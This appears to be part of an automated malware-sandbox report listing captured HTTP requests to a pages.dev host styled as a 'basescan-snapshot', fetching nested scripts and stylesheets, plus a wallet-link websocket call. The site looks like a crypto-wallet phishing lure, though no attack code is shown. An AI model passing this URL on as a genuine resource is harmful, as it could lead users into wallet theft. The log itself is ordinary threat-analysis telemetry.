            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: BSohuU7HENQZj7V/kTUyMA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
